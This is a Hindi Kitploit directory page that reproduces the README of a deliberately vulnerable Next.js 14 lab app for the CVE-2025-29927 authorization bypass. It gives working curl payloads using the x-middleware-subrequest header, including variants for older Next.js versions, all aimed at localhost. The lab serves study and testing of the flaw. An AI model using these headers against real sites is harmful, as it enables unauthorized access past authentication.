Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
उपकरण/GitHubGitHub/lirantal/vulnerable-nextjs-14-cve-2025-29927
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHublirantal/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1482 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-29927 प्राधिकरण बायपास पुनरुत्पादन

यह रिपॉज़िटरी next पैकेज में CVE-2025-29927 भेद्यता का पुनरुत्पादन है

पुनरुत्पादन कैसे करें

  1. Next.js एप्लिकेशन को क्लोन करने और चलाने के लिए नीचे दिए गए चरणों का पालन करें
  2. जाँच करें कि प्राधिकरण /api/hello एंडपॉइंट तक पहुँच से इनकार करता है
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. जाँच करें कि टोकन प्रदान करने पर प्राधिकरण काम करता है
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. अब इसे तब भी बायपास किया जा सकता है जब हम middleware को विशेष x-middleware-subrequest हेडर में 5 बार नेस्ट करते हैं:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

पुराने Next.js संस्करणों के लिए CVE-2025-29927 का शोषण

Next.js 12 और 13 संस्करणों में मिडलवेयर फ़ाइल (_middleware.js) के लिए एक अलग नामकरण कन्वेंशन हुआ करता था, जिसे Next.js 14 में बदलकर middleware.js कर दिया गया। पुराने संस्करणों में _middleware.js फ़ाइल का उपयोग करके इस भेद्यता का शोषण किया जा सकता है।

उदाहरण के लिए, Next.js संस्करण और आपकी रूटिंग कन्वेंशन के आधार पर निम्नलिखित पेलोड लागू होंगे:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (Next.js संस्करण 12.2 के लिए जिसमें middleware.js फ़ाइल ऐप के रूट में है, न कि pages निर्देशिका के अंदर)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (Next.js संस्करण 11 से 12.2 तक के लिए)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

आरंभ करना

सबसे पहले, डेवलपमेंट सर्वर चलाएँ:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

परिणाम देखने के लिए अपने ब्राउज़र में http://localhost:3000 खोलें।

आप app/page.js को संशोधित करके पेज का संपादन शुरू कर सकते हैं। फ़ाइल संपादित करते ही पेज अपने आप अपडेट हो जाता है।

यह प्रोजेक्ट Vercel के लिए एक नया फ़ॉन्ट परिवार Geist को स्वचालित रूप से अनुकूलित और लोड करने के लिए next/font का उपयोग करता है।

और अधिक जानें

Next.js के बारे में अधिक जानने के लिए, निम्नलिखित संसाधनों को देखें:

  • Next.js Documentation - Next.js सुविधाओं और API के बारे में जानें।
  • Learn Next.js - एक इंटरैक्टिव Next.js ट्यूटोरियल।

आप Next.js GitHub रिपॉज़िटरी देख सकते हैं - आपकी प्रतिक्रिया और योगदान का स्वागत है!

Vercel पर डिप्लॉय करें

अपने Next.js ऐप को डिप्लॉय करने का सबसे आसान तरीका Next.js के निर्माताओं द्वारा बनाए गए Vercel Platform का उपयोग करना है।

अधिक विवरण के लिए हमारे Next.js डिप्लॉयमेंट दस्तावेज़ देखें।

योगदान

इस प्रोजेक्ट में योगदान करने के दिशानिर्देशों के लिए कृपया CONTRIBUTING देखें।

टूल डाउनलोड करें